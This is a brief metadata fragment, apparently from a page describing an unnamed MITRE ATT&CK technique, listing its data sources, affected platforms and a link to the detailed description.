Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre